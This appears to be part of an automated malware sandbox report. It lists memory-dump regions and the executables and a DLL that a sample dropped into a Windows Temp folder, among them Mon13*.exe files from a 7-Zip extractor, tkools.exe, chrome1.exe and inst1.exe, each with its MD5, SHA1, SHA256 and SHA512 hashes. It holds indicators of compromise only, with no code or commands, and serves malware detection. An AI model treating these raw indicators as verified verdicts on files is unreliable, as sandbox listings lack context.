memory/2740-246-0x0000000006A10000-0x0000000006A11000-memory.dmp

memory/1376-215-0x00000000006A0000-0x00000000006A1000-memory.dmp

memory/2764-214-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-1GIM0.tmp\Mon13d453d994180b.tmp

MD5 ed5b2c2bf689ca52e9b53f6bc2195c63
SHA1 f61d31d176ba67cfff4f0cab04b4b2d19df91684
SHA256 4feb70ee4d54dd933dfa3a8d0461dc428484489e8a34b905276a799e0bf9220f
SHA512 b8c6e7b16fd13ca570cabd6ea29f33ba90e7318f7076862257f18f6a22695d92d608ca5e5c3d99034757b4e5b7167d4586b922eebf0e090f78df67651bde5179

C:\Users\Admin\AppData\Local\Temp\is-CKCAP.tmp\Mon13073304e5395.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/2340-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

memory/2740-206-0x0000000003EF0000-0x0000000003EF1000-memory.dmp

memory/5056-205-0x0000000000000000-mapping.dmp

memory/4696-204-0x00000000032C0000-0x00000000032C1000-memory.dmp

memory/4996-203-0x0000000000000000-mapping.dmp

memory/2740-202-0x0000000003EF0000-0x0000000003EF1000-memory.dmp

memory/4696-200-0x00000000032C0000-0x00000000032C1000-memory.dmp

memory/4260-199-0x0000000000000000-mapping.dmp

memory/3952-192-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon133b4073df5e3f72.exe

MD5 0cda8f6df2e7cd3c6db9349cb26d2c4e
SHA1 8e6c43044e4da32d695c572c9d383e8ae215f166
SHA256 73dace480b0b7455b5547c42415b1143a366e3b3bfb9fd74da5f0ed9c7f5eced
SHA512 17723b907ea48c57ac4eeaadb153d5ed98f264e188fa584ef8b8d8ed571bb58320532ea86398d12b4c5b430b2395fe2dbccf546895c6f7912fe2eef41fd44591

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13136643d24e51.exe

MD5 bb4b173a73d02dbca1350fa67c86f96c
SHA1 c4f808fe7ec700e2419c1c9c1dc946fa61d29e33
SHA256 7b13d1a5c00e05fc90788429a511868cf5eefd255762092e35f3cca367ae1c1c
SHA512 d94cc4ed42f5661da8467bb0966574628d67589112f5d21a0161bbd6dea8de55774d86aa7c5cc447712309c3d8c426cb120091f6d477cbcf6914ded60d9c932e

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13459b4085.exe

MD5 7347dd0c4a357c8a15791f5969ae9a7f
SHA1 96f8765877e5dd1ece2fb8f034ad930e4f06093e
SHA256 5db75fec069bb4dc332831c53ad7fd5f223a8528cbd0411ec2fdd9ffc34d60c2
SHA512 28ebf357c7466f653007f1603603709f5e73906383278206da50494d997758525eca1c27f6863544436c8541b4300ac372299d83bdddfdfb2124f13980d39f45

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13d453d994180b.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon1348816450.exe

MD5 85346cbe49b2933a57b719df00196ed6
SHA1 644de673dc192b599a7bb1eaa3f6a97ddd8b9f0d
SHA256 45ed5fbac043165057280feac2c2b8afcf9981b5c1b656aa4bf1c03cf3144d42
SHA512 89f01bff5c874e77d7d4512ba787dd760ec81b2e42d8fe8430ca5247f33eed780c406dcd7f0f763a66fb0d20009357e93275fabeef4475fc7d08cd42cddb8cce

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13be6b39578.exe

MD5 de86aa83e2e8a406f396412b4fc1a459
SHA1 43b171a9c3c7a3f3d813434b4f74a1d66015244c
SHA256 58c53388484af231197685f7dce6e5bb9b1ca5a209e6f010ea8b14699394ae7f
SHA512 084cefa9847bf2e3c7bffdc7aee4c40291a0e2533972226839783ca93b3e37ddf8952a1653d2deb42cecfaa0872c756c47e14cf3eb12dacd4adc4bfbce3ce759

memory/1280-174-0x0000000000000000-mapping.dmp

memory/1816-176-0x0000000000000000-mapping.dmp

memory/1464-169-0x0000000000000000-mapping.dmp

memory/1496-168-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13470f9aa951f871.exe

MD5 d59efc905936700fabb5d453675d4eb5
SHA1 c8e75337df7a646cddd129a4cee075ce323b024f
SHA256 b6687b07e40db271defd60b13a0fb0f64c9bbcc60892a719e3bbfb7411006c04
SHA512 4347c5ae82d2f5983775228e3896a81ad31904666d23cce46fe1f7894bda4fdc21adab847c4e57d438e1c570d5263960ee098092657cc6e64532099dc9bc2d56

memory/1640-172-0x0000000000000000-mapping.dmp

memory/1180-171-0x0000000000000000-mapping.dmp

memory/1376-170-0x0000000000000000-mapping.dmp

memory/1264-166-0x0000000000000000-mapping.dmp

memory/2680-268-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13248c3d7ea8c81.exe

MD5 e84d105d0c3ac864ee0aacf7716f48fd
SHA1 ce77ad0ab6e3861e7720ce2ae743aec4ef78f21a
SHA256 6b8ec5b540e75a799589a459cc46b4cec5c3c6d6e9376e7c48172fca66f41344
SHA512 8e66742b58408ed77946c024dd216ee162e5a72637bccb5276908cc1886c69618a3d63a17d7101d56079cb2ea3a2730fcd7773612bc28a3fb5fb0383ed651dc2

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 54c8b761f8a0670409d5651f75297d96
SHA1 da8a479f181f644eb10fedea2b1d5637da8a43c2
SHA256 bb4ad9554e4dd6ec5b9b938b25594ba35495302d0a4974fecce6e34bb36ee0d6
SHA512 2b942ece79b0f45421014937c92599f0f56a6382ef6cf4d2f26df4da8599cac99be36317a87e7a0b8056108dbdba198e79a058180c2bee19c4b3446ea8071d86

memory/2680-271-0x0000000000400000-0x0000000000401000-memory.dmp

memory/2276-273-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 54c8b761f8a0670409d5651f75297d96
SHA1 da8a479f181f644eb10fedea2b1d5637da8a43c2
SHA256 bb4ad9554e4dd6ec5b9b938b25594ba35495302d0a4974fecce6e34bb36ee0d6
SHA512 2b942ece79b0f45421014937c92599f0f56a6382ef6cf4d2f26df4da8599cac99be36317a87e7a0b8056108dbdba198e79a058180c2bee19c4b3446ea8071d86

C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-LQGDR.tmp\Mon13073304e5395.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1920-276-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2824-277-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

MD5 de86aa83e2e8a406f396412b4fc1a459
SHA1 43b171a9c3c7a3f3d813434b4f74a1d66015244c
SHA256 58c53388484af231197685f7dce6e5bb9b1ca5a209e6f010ea8b14699394ae7f
SHA512 084cefa9847bf2e3c7bffdc7aee4c40291a0e2533972226839783ca93b3e37ddf8952a1653d2deb42cecfaa0872c756c47e14cf3eb12dacd4adc4bfbce3ce759

memory/2144-283-0x0000000000418EFA-mapping.dmp

memory/4000-285-0x0000000000000000-mapping.dmp

memory/2144-291-0x0000000005650000-0x0000000005651000-memory.dmp

memory/4636-292-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe

MD5 d154cb3796a5800eae082bc670467c6e
SHA1 a5ac2683f0077ef8c685099c235eef8a665fa22a
SHA256 6dd9f0d5110c7437b151f52376f893b486e8518aacf7821b9fc10b3915b984df
SHA512 dbe780ddd25694706b8aa897625e21638e9ad668ac2663c5d4a2579a2ac0d1c47eecf065e08f3d01966db79faa7961c265281bd2b021803901df83d8b1d60b31

memory/4680-297-0x0000000000000000-mapping.dmp

memory/2144-299-0x0000000005220000-0x0000000005221000-memory.dmp

memory/2144-296-0x00000000050F0000-0x00000000050F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe

MD5 d154cb3796a5800eae082bc670467c6e
SHA1 a5ac2683f0077ef8c685099c235eef8a665fa22a
SHA256 6dd9f0d5110c7437b151f52376f893b486e8518aacf7821b9fc10b3915b984df
SHA512 dbe780ddd25694706b8aa897625e21638e9ad668ac2663c5d4a2579a2ac0d1c47eecf065e08f3d01966db79faa7961c265281bd2b021803901df83d8b1d60b31

memory/4000-290-0x00000000002F0000-0x00000000002F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe

MD5 87a05df1d53251da9a05be73d636760d
SHA1 a3b9fee427da74725fe0cd6896fcba45745941ec
SHA256 230db1bb45e3d88f8424e4b4b97d074e831a13f6933ed1bb9567e8e701774949
SHA512 23c739d2ea66ad05b004d14424998da892fd773dc9336a373592ab64540b35dff06957dae895aea7b9a7b295b6985580997bd086c99ba173e997857a8afe6237

C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe

MD5 87a05df1d53251da9a05be73d636760d
SHA1 a3b9fee427da74725fe0cd6896fcba45745941ec
SHA256 230db1bb45e3d88f8424e4b4b97d074e831a13f6933ed1bb9567e8e701774949
SHA512 23c739d2ea66ad05b004d14424998da892fd773dc9336a373592ab64540b35dff06957dae895aea7b9a7b295b6985580997bd086c99ba173e997857a8afe6237

memory/520-305-0x0000000000000000-mapping.dmp

memory/380-308-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\chrome1.exe

MD5 11033c9d0e64292c41f294485d665d2e
SHA1 0fd7c7bbd85a1c13893acbc6ca743838ffef522f
SHA256 865e7271a4d2856913597c753fa4b8f50f78c2d9e56d732aa6299e949e2e1572
SHA512 df1a3ca90f2625e01307f108fc3bf4ff94a8a610703e2be391221d5556debc89e96f6dbd62a6df7465b7aaeed6558d1831140a677eabd01e7fc123bbc82262f4

memory/2824-309-0x00000000008A0000-0x00000000008A1000-memory.dmp

memory/4680-318-0x0000000000570000-0x00000000006BA000-memory.dmp

memory/2424-319-0x0000000000000000-mapping.dmp

memory/4000-324-0x0000000004C60000-0x0000000004C61000-memory.dmp

memory/2144-327-0x0000000005040000-0x0000000005646000-memory.dmp

memory/380-322-0x0000000001730000-0x0000000001732000-memory.dmp

memory/1732-335-0x0000000000000000-mapping.dmp

memory/728-330-0x0000000000000000-mapping.dmp

memory/4680-315-0x00000000001E0000-0x00000000001F0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chrome1.exe

MD5 11033c9d0e64292c41f294485d665d2e
SHA1 0fd7c7bbd85a1c13893acbc6ca743838ffef522f
SHA256 865e7271a4d2856913597c753fa4b8f50f78c2d9e56d732aa6299e949e2e1572
SHA512 df1a3ca90f2625e01307f108fc3bf4ff94a8a610703e2be391221d5556debc89e96f6dbd62a6df7465b7aaeed6558d1831140a677eabd01e7fc123bbc82262f4

memory/2424-336-0x000000001BAF0000-0x000000001BAF2000-memory.dmp

memory/700-337-0x0000000000000000-mapping.dmp

memory/2740-306-0x0000000007760000-0x0000000007761000-memory.dmp

memory/4232-338-0x0000000000000000-mapping.dmp

memory/2260-341-0x0000000000000000-mapping.dmp

memory/4636-344-0x0000000002150000-0x00000000021CB000-memory.dmp

memory/5064-342-0x0000000000000000-mapping.dmp

memory/5024-349-0x0000000000000000-mapping.dmp

memory/4636-350-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4232-352-0x0000000001460000-0x0000000001462000-memory.dmp

memory/1640-351-0x0000000007790000-0x00000000078DC000-memory.dmp

memory/2260-348-0x000000001BCE0000-0x000000001BCE2000-memory.dmp

memory/4636-347-0x00000000021D0000-0x00000000022A5000-memory.dmp

memory/980-346-0x0000000000000000-mapping.dmp

memory/1120-355-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\inst1.exe

MD5 e5f9bcffdde599dd66c729fe2868e411
SHA1 2990ab84be3b99e687ced6c25c9548c3a0757e25
SHA256 c5099f6b446fcc8fd368148b66879910466a02f84d2975467a43a0e4cac11fe8
SHA512 7965c1b0828835adb171ac2a8a5938fd175aefce43353eb29d124e9cb5e324376c3f6e74528c8e066b3ee67f08bff06b5cbd9072772986713360423276e8a8fa

C:\Users\Admin\AppData\Local\Temp\inst1.exe

MD5 e5f9bcffdde599dd66c729fe2868e411
SHA1 2990ab84be3b99e687ced6c25c9548c3a0757e25
SHA256 c5099f6b446fcc8fd368148b66879910466a02f84d2975467a43a0e4cac11fe8
SHA512 7965c1b0828835adb171ac2a8a5938fd175aefce43353eb29d124e9cb5e324376c3f6e74528c8e066b3ee67f08bff06b5cbd9072772986713360423276e8a8fa

memory/2740-301-0x0000000006B90000-0x0000000006B91000-memory.dmp

memory/4000-300-0x0000000000A20000-0x0000000000A21000-memory.dmp

memory/3056-298-0x00000000008D0000-0x00000000008E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSC0FFECE5\Mon13bb1ac8986b773.exe

MD5 96ab6b706f75ca5e1f3ccdf189ada08e
SHA1 6f851beb4ef8a534b5d65708392cefeb3650b074
SHA256 071350da27f8c628f61fdcc22f22217a96ffe413b4663349edadc7cdacf4bd18
SHA512 1671719806744e3f8f1dd21fcecaafc9f4162d76958f740ddd7729828090aecb3e5e55bd5a16d4e1aa573511b4b1d71bd86b90fab74687776fb273e8058abe34

memory/2144-282-0x0000000000400000-0x0000000000420000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe

MD5 de86aa83e2e8a406f396412b4fc1a459
SHA1 43b171a9c3c7a3f3d813434b4f74a1d66015244c
SHA256 58c53388484af231197685f7dce6e5bb9b1ca5a209e6f010ea8b14699394ae7f
SHA512 084cefa9847bf2e3c7bffdc7aee4c40291a0e2533972226839783ca93b3e37ddf8952a1653d2deb42cecfaa0872c756c47e14cf3eb12dacd4adc4bfbce3ce759

\Users\Admin\AppData\Local\Temp\is-BR1JS.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2276-278-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/4404-358-0x0000000000000000-mapping.dmp

memory/728-359-0x00000000001D0000-0x00000000001F6000-memory.dmp

memory/1376-360-0x0000000000000000-mapping.dmp

memory/728-362-0x0000000000400000-0x000000000045E000-memory.dmp

memory/728-361-0x0000000000530000-0x0000000000573000-memory.dmp

memory/2944-363-0x0000000000000000-mapping.dmp

memory/4604-364-0x0000000000000000-mapping.dmp

memory/4240-366-0x0000000000000000-mapping.dmp

memory/1936-365-0x0000000000000000-mapping.dmp

memory/4292-368-0x0000000000000000-mapping.dmp

memory/4696-388-0x000000007F310000-0x000000007F311000-memory.dmp

memory/2740-390-0x000000007EC70000-0x000000007EC71000-memory.dmp

memory/4604-414-0x0000000004C60000-0x0000000004C61000-memory.dmp

memory/2688-418-0x0000000077250000-0x00000000773DE000-memory.dmp

memory/5196-446-0x00000000055E0000-0x00000000055E1000-memory.dmp

memory/2688-449-0x00000000057C0000-0x00000000057C1000-memory.dmp

memory/3804-451-0x0000000005640000-0x0000000005641000-memory.dmp

memory/4252-461-0x00000000013B0000-0x00000000013B1000-memory.dmp

memory/2740-466-0x00000000065C3000-0x00000000065C4000-memory.dmp

memory/4696-462-0x00000000071B3000-0x00000000071B4000-memory.dmp

memory/5020-495-0x00000000048CB000-0x00000000049CC000-memory.dmp

memory/5868-498-0x0000000000460000-0x000000000050E000-memory.dmp

memory/4748-515-0x00000237FDAC0000-0x00000237FDB32000-memory.dmp

memory/5868-518-0x0000000000400000-0x0000000000455000-memory.dmp

memory/5868-512-0x0000000002070000-0x00000000020A9000-memory.dmp

memory/1344-530-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2844-533-0x0000021F9D370000-0x0000021F9D3E2000-memory.dmp

memory/5596-547-0x0000018F31000000-0x0000018F31072000-memory.dmp

memory/5868-542-0x00000000049C4000-0x00000000049C6000-memory.dmp

memory/5868-538-0x00000000049C2000-0x00000000049C3000-memory.dmp

memory/5020-523-0x0000000002F50000-0x0000000002FAD000-memory.dmp

memory/4748-507-0x00000237FD7F0000-0x00000237FD83D000-memory.dmp

memory/6124-550-0x00000000001E0000-0x00000000001E8000-memory.dmp

memory/6124-554-0x00000000001F0000-0x00000000001F9000-memory.dmp

memory/6124-558-0x0000000000400000-0x0000000000432000-memory.dmp

memory/5868-502-0x00000000049C0000-0x00000000049C1000-memory.dmp

memory/388-562-0x000001C0B73A0000-0x000001C0B7412000-memory.dmp